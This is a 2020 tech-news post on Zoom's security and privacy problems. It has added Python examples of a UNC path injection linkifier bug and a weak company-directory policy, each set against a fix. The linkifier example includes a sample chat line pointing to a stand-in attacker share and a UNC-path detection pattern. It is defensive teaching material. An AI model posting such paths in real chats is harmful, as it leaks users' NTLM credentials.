Multiple privacy weaknesses found in Zoom - NASA and SpaceX ban use

Posted on Thursday, April 02 2020 @ 12:32 CEST by Thomas De Maesschalck
With millions of people simultaneously working from home due to the coronavirus pandemic, there has been a massive increase in the use of video conferencing services like Google Hangouts, Microsoft Teams and Zoom. Unfortunately, the latter has found itself in hot water over a series of privacy and security issues.

The Tech Report has an overview. First up, there was a report that the Zoom iOS app sent user data to Facebook, without even complying with Facebook's terms of service. That data sharing has now been stopped.

Next, there's controversy about Zoom's claim that it offers end-to-end (E2E) encryption. After some scrutiny, Zoom admitted that it is currently not possible to enable E2E encryption for Zoom video meetings. As things stand right now, Zoom can see the contents of your video calls:
This usage of the term “end-to-end” is misleading because, as The Intercept points out, the supposed “end points” sit between the Zoom clients. The “ends” in E2E encryption are supposed to be the clients. While it is true that Zoom uses standard TLS to encrypt information sent between clients and the Zoom server, Zoom holds the key to decrypt this information once it reaches its servers, meaning Zoom can see the contents of your video calls. True E2E encryption necessitates that the service provider, Zoom in this case, does not hold the encryption key. The only feature of Zoom with true E2E encryption available is its text chat.
Then there's a security issue. Security researcher @_g0dmode discovered that Zoom's text chat is vulnerable to a UNC path injection attack: a Windows network path such as \\host\share posted in the chat is rendered as a clickable link. When a user clicks it, Windows tries to open the share over SMB and authenticates to the host named in the path, which hands an attacker who controls that host the user's NTLM credentials (a hash that can be cracked offline or relayed).
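The core of the bug is a chat linkifier that turns anything path-like into a link. The following is an added illustration of that bug class and its fix, not Zoom's code; the message texts, host names and regular expressions are constructed for the example:

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample chat messages (fictitious hosts, not captured Zoom traffic).
SAMPLE_MESSAGES = [
    "Slides are at https://example.com/deck.pdf",
    r"Check the notes at \\10.0.0.5\share\notes.txt",
    "Minutes: \\\\evil.example\\loot",
]

# Anything a naive linkifier might treat as a link: an http(s) URL or a UNC path.
URL_RE = re.compile(r"https?://\S+")
UNC_RE = re.compile(r"\\\\[^\s\\]+\\\S*")
LINKISH_RE = re.compile(URL_RE.pattern + "|" + UNC_RE.pattern)


def linkify_naive(message):
    """Vulnerable linkifier: every URL-or-path-looking token becomes a clickable link.
    A UNC path rendered as a link means one click makes Windows open an SMB
    session to the attacker's host and authenticate with the user's NTLM credentials.
    """
    def wrap(match):
        target = match.group(0)
        return f'<a href="{html.escape(target)}">{html.escape(target)}</a>'
    return LINKISH_RE.sub(wrap, html.escape(message, quote=False))


def linkify_safe(message):
    """Hardened linkifier: allowlist http/https URLs with a host; everything else,
    UNC paths included, stays plain text."""
    def wrap(match):
        target = match.group(0)
        parsed = urlparse(target)
        if parsed.scheme in ("http", "https") and parsed.netloc:
            return f'<a href="{html.escape(target)}">{html.escape(target)}</a>'
        return html.escape(target)
    return URL_RE.sub(wrap, html.escape(message, quote=False))


def find_unc_paths(message):
    """Detection helper for a chat gateway or DLP rule: list UNC paths in a message."""
    return UNC_RE.findall(message)


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print("naive :", linkify_naive(msg))
        print("safe  :", linkify_safe(msg))
        print("unc   :", find_unc_paths(msg))
```

The client-side fix is the allowlist in `linkify_safe`. Independently of the client, Windows administrators can stop the credential leaving the machine even if a user clicks: set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to "Deny all" (with exceptions for legitimate internal servers), and block outbound TCP port 445 to the Internet at the perimeter.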

Finally, Zoom's "company directory" exposes names, e-mail addresses and profile photos of those who subscribe to the service with a non-standard e-mail provider:
Unfortunately, this feature seems to extend to those using non-standard email providers, as the feature simply checks the domain name in your email address against a blacklist of email providers maintained by Zoom. If your email provider’s domain name does not appear in this blacklist, the email addresses, profile pictures, and status of all other users of that email provider who are subscribed to Zoom will appear in your contact list.
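The design flaw is a default-allow decision: "not a known public provider" is treated as "same organisation". The following added example (not Zoom's code; the account list, domains and policy names are constructed) puts the blacklist logic described above next to a default-deny version that only groups users under domains an organisation has actually claimed and verified, plus an audit that reports which domains leak under the weak policy:

```python
# Constructed sample of subscriber accounts (fictitious addresses).
ACCOUNTS = [
    {"email": "alice@example-corp.com", "name": "Alice"},
    {"email": "bob@example-corp.com", "name": "Bob"},
    {"email": "carol@gmail.com", "name": "Carol"},
    {"email": "dave@gmail.com", "name": "Dave"},
    {"email": "erin@smallisp.example", "name": "Erin"},
    {"email": "frank@smallisp.example", "name": "Frank"},
]

# A blacklist of well-known public mail providers (assumed; the real list is Zoom's).
PUBLIC_PROVIDER_BLACKLIST = {"gmail.com", "yahoo.com", "outlook.com", "hotmail.com"}

# Domains an organisation has claimed and proven ownership of (e.g. via a DNS record).
VERIFIED_ORG_DOMAINS = {"example-corp.com"}


def domain_of(email):
    """Return the lower-cased domain part of an address."""
    return email.rsplit("@", 1)[1].lower()


def colleagues(user_email, accounts):
    """All other subscribers sharing the user's mail domain."""
    d = domain_of(user_email)
    return sorted(a["email"] for a in accounts
                  if domain_of(a["email"]) == d and a["email"] != user_email)


def directory_blacklist(user_email, accounts):
    """Weak policy from the article: anyone whose domain is not on the public-provider
    blacklist is shown every other subscriber on that domain. A small ISP or a
    regional mail provider that the blacklist misses leaks all of its users."""
    if domain_of(user_email) in PUBLIC_PROVIDER_BLACKLIST:
        return []
    return colleagues(user_email, accounts)


def directory_allowlist(user_email, accounts, verified_domains=VERIFIED_ORG_DOMAINS):
    """Corrected policy: default deny. A directory is only built for domains an
    organisation has verified; an unknown domain gets an empty directory."""
    if domain_of(user_email) not in verified_domains:
        return []
    return colleagues(user_email, accounts)


def leaking_domains(accounts, verified_domains=VERIFIED_ORG_DOMAINS):
    """Audit: domains whose users would see strangers under the blacklist policy
    but nobody under the allowlist policy."""
    leaks = set()
    for a in accounts:
        e = a["email"]
        if directory_blacklist(e, accounts) and not directory_allowlist(e, accounts, verified_domains):
            leaks.add(domain_of(e))
    return sorted(leaks)


if __name__ == "__main__":
    for a in ACCOUNTS:
        print(a["email"], "blacklist:", directory_blacklist(a["email"], ACCOUNTS),
              "allowlist:", directory_allowlist(a["email"], ACCOUNTS))
    print("domains leaking under blacklist policy:", leaking_domains(ACCOUNTS))
```

The blacklist can never be complete, since any new or small mail provider is absent from it by default; an allowlist of verified domains fails closed instead.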
In response to these privacy and security concerns, some organizations, including SpaceX and NASA, have already forbidden their employees from using Zoom.


About the Author

Thomas De Maesschalck

Thomas has been messing with computers since early childhood and firmly believes the Internet is the best thing since sliced bread. He enjoys playing with new tech, is fascinated by science, and is passionate about financial markets. When not behind a computer, he can be found with running shoes on or lifting heavy weights in the weight room.